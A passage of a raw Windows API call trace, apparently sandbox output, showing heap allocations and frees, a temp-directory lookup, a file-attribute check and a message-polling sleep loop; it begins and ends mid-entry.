RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0304.677] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0304.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0304.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0304.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0304.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0304.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0304.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4d8 [0304.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0304.677] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0304.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0304.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0304.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0304.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0304.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0304.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0304.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0304.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0304.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0304.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0304.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0304.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0304.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0304.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0304.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0304.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0304.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0304.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0304.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0304.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0304.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0304.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0304.678] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0304.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0304.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0304.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0304.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0304.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0304.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0304.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0304.679] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0304.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0304.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0304.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0304.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0304.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0304.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0304.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0304.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0304.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0304.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0304.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0304.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0304.679] timeGetTime () returned 0x4c198 [0304.679] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.680] Sleep (dwMilliseconds=0xa) [0304.684] timeGetTime () returned 0x4c1a8 [0304.684] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.684] Sleep (dwMilliseconds=0xa) [0304.700] timeGetTime () returned 0x4c1b7 [0304.700] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.700] Sleep (dwMilliseconds=0xa) [0304.715] timeGetTime () returned 0x4c1c7 [0304.715] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.715] Sleep (dwMilliseconds=0xa) [0304.731] timeGetTime () returned 0x4c1d7 [0304.731] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.731] Sleep (dwMilliseconds=0xa) [0304.746] timeGetTime () returned 0x4c1e6 [0304.746] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.746] Sleep (dwMilliseconds=0xa) [0304.762] timeGetTime () returned 0x4c1f6 [0304.762] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.762] Sleep (dwMilliseconds=0xa) [0304.778] timeGetTime () returned 0x4c205 [0304.778] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.778] Sleep (dwMilliseconds=0xa) [0304.793] timeGetTime () returned 0x4c215 [0304.793] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.793] Sleep (dwMilliseconds=0xa) [0304.809] timeGetTime () returned 0x4c225 [0304.809] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.809] Sleep (dwMilliseconds=0xa) [0304.824] timeGetTime () returned 0x4c234 [0304.824] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.824] Sleep (dwMilliseconds=0xa) [0304.840] timeGetTime () returned 0x4c244 [0304.840] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.840] Sleep (dwMilliseconds=0xa) [0304.856] timeGetTime () returned 0x4c253 [0304.856] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.856] Sleep (dwMilliseconds=0xa) [0304.872] timeGetTime () returned 0x4c263 [0304.872] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.872] Sleep (dwMilliseconds=0xa) [0304.887] timeGetTime () returned 0x4c273 [0304.887] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.887] Sleep (dwMilliseconds=0xa) [0304.902] timeGetTime () returned 0x4c282 [0304.903] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.903] Sleep (dwMilliseconds=0xa) [0304.919] timeGetTime () returned 0x4c292 [0304.919] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.919] Sleep (dwMilliseconds=0xa) [0304.935] timeGetTime () returned 0x4c2a1 [0304.935] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.935] Sleep (dwMilliseconds=0xa) [0304.949] timeGetTime () returned 0x4c2b1 [0304.949] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.949] Sleep (dwMilliseconds=0xa) [0304.972] timeGetTime () returned 0x4c2c1 [0304.972] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.972] Sleep (dwMilliseconds=0xa) [0304.980] timeGetTime () returned 0x4c2d0 [0304.980] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.980] Sleep (dwMilliseconds=0xa) [0304.996] timeGetTime () returned 0x4c2e0 [0304.996] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0304.996] Sleep (dwMilliseconds=0xa) [0305.012] timeGetTime () returned 0x4c2ef [0305.012] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.012] Sleep (dwMilliseconds=0xa) [0305.028] timeGetTime () returned 0x4c2ff [0305.028] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.028] Sleep (dwMilliseconds=0xa) [0305.043] timeGetTime () returned 0x4c30f [0305.043] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.043] Sleep (dwMilliseconds=0xa) [0305.058] timeGetTime () returned 0x4c31e [0305.058] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.059] Sleep (dwMilliseconds=0xa) [0305.074] timeGetTime () returned 0x4c32e [0305.074] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.074] Sleep (dwMilliseconds=0xa) [0305.090] timeGetTime () returned 0x4c33d [0305.090] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.090] Sleep (dwMilliseconds=0xa) [0305.106] timeGetTime () returned 0x4c34d [0305.106] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.106] Sleep (dwMilliseconds=0xa) [0305.127] timeGetTime () returned 0x4c35d [0305.127] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.128] Sleep (dwMilliseconds=0xa) [0305.136] timeGetTime () returned 0x4c36c [0305.136] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.136] Sleep (dwMilliseconds=0xa) [0305.155] timeGetTime () returned 0x4c37c [0305.156] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.156] Sleep (dwMilliseconds=0xa) [0305.168] timeGetTime () returned 0x4c38b [0305.168] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.168] Sleep (dwMilliseconds=0xa) [0305.183] timeGetTime () returned 0x4c39b [0305.183] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.183] Sleep (dwMilliseconds=0xa) [0305.199] timeGetTime () returned 0x4c3ab [0305.199] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.199] Sleep (dwMilliseconds=0xa) [0305.214] timeGetTime () returned 0x4c3ba [0305.214] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.214] Sleep (dwMilliseconds=0xa) [0305.230] timeGetTime () returned 0x4c3ca [0305.230] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.230] Sleep (dwMilliseconds=0xa) [0305.246] timeGetTime () returned 0x4c3d9 [0305.246] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.246] Sleep (dwMilliseconds=0xa) [0305.263] timeGetTime () returned 0x4c3e9 [0305.263] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0305.263] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0305.263] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0305.264] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0305.264] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0305.264] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.264] Sleep (dwMilliseconds=0xa) [0305.277] timeGetTime () returned 0x4c3f9 [0305.277] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.277] Sleep (dwMilliseconds=0xa) [0305.295] timeGetTime () returned 0x4c408 [0305.295] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.295] Sleep (dwMilliseconds=0xa) [0305.308] timeGetTime () returned 0x4c418 [0305.308] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.308] Sleep (dwMilliseconds=0xa) [0305.324] timeGetTime () returned 0x4c427 [0305.324] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.324] Sleep (dwMilliseconds=0xa) [0305.340] timeGetTime () returned 0x4c437 [0305.340] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.340] Sleep (dwMilliseconds=0xa) [0305.355] timeGetTime () returned 0x4c447 [0305.355] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.355] Sleep (dwMilliseconds=0xa) [0305.370] timeGetTime () returned 0x4c456 [0305.371] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.371] Sleep (dwMilliseconds=0xa) [0305.386] timeGetTime () returned 0x4c466 [0305.387] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.387] Sleep (dwMilliseconds=0xa) [0305.402] timeGetTime () returned 0x4c475 [0305.402] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.402] Sleep (dwMilliseconds=0xa) [0305.417] timeGetTime () returned 0x4c485 [0305.417] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.417] Sleep (dwMilliseconds=0xa) [0305.433] timeGetTime () returned 0x4c495 [0305.433] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.433] Sleep (dwMilliseconds=0xa) [0305.449] timeGetTime () returned 0x4c4a4 [0305.449] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.449] Sleep (dwMilliseconds=0xa) [0305.464] timeGetTime () returned 0x4c4b4 [0305.464] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.464] Sleep (dwMilliseconds=0xa) [0305.480] timeGetTime () returned 0x4c4c3 [0305.480] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.480] Sleep (dwMilliseconds=0xa) [0305.504] timeGetTime () returned 0x4c4d3 [0305.504] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.504] Sleep (dwMilliseconds=0xa) [0305.515] timeGetTime () returned 0x4c4e3 [0305.515] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.515] Sleep (dwMilliseconds=0xa) [0305.527] timeGetTime () returned 0x4c4f2 [0305.528] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.528] Sleep (dwMilliseconds=0xa) [0305.542] timeGetTime () returned 0x4c502 [0305.542] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.542] Sleep (dwMilliseconds=0xa) [0305.576] timeGetTime () returned 0x4c521 [0305.576] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.576] Sleep (dwMilliseconds=0xa) [0305.590] timeGetTime () returned 0x4c531 [0305.591] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.591] Sleep (dwMilliseconds=0xa) [0305.604] timeGetTime () returned 0x4c540 [0305.605] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.605] Sleep (dwMilliseconds=0xa) [0305.621] timeGetTime () returned 0x4c550 [0305.621] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.621] Sleep (dwMilliseconds=0xa) [0305.639] timeGetTime () returned 0x4c55f [0305.639] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.646] Sleep (dwMilliseconds=0xa) [0305.651] timeGetTime () returned 0x4c56f [0305.651] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.651] Sleep (dwMilliseconds=0xa) [0305.667] timeGetTime () returned 0x4c57f [0305.667] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0305.667] Sleep (dwMilliseconds=0xa) [0305.684] timeGetTime () returned 0x4c58e [0305.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0305.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0305.685] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0305.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0305.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0305.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0305.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0305.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0305.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0305.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0305.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0305.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0305.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0305.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0305.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0305.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0305.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0305.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0305.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0305.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0305.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0305.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0305.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0305.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0305.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0305.687] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: 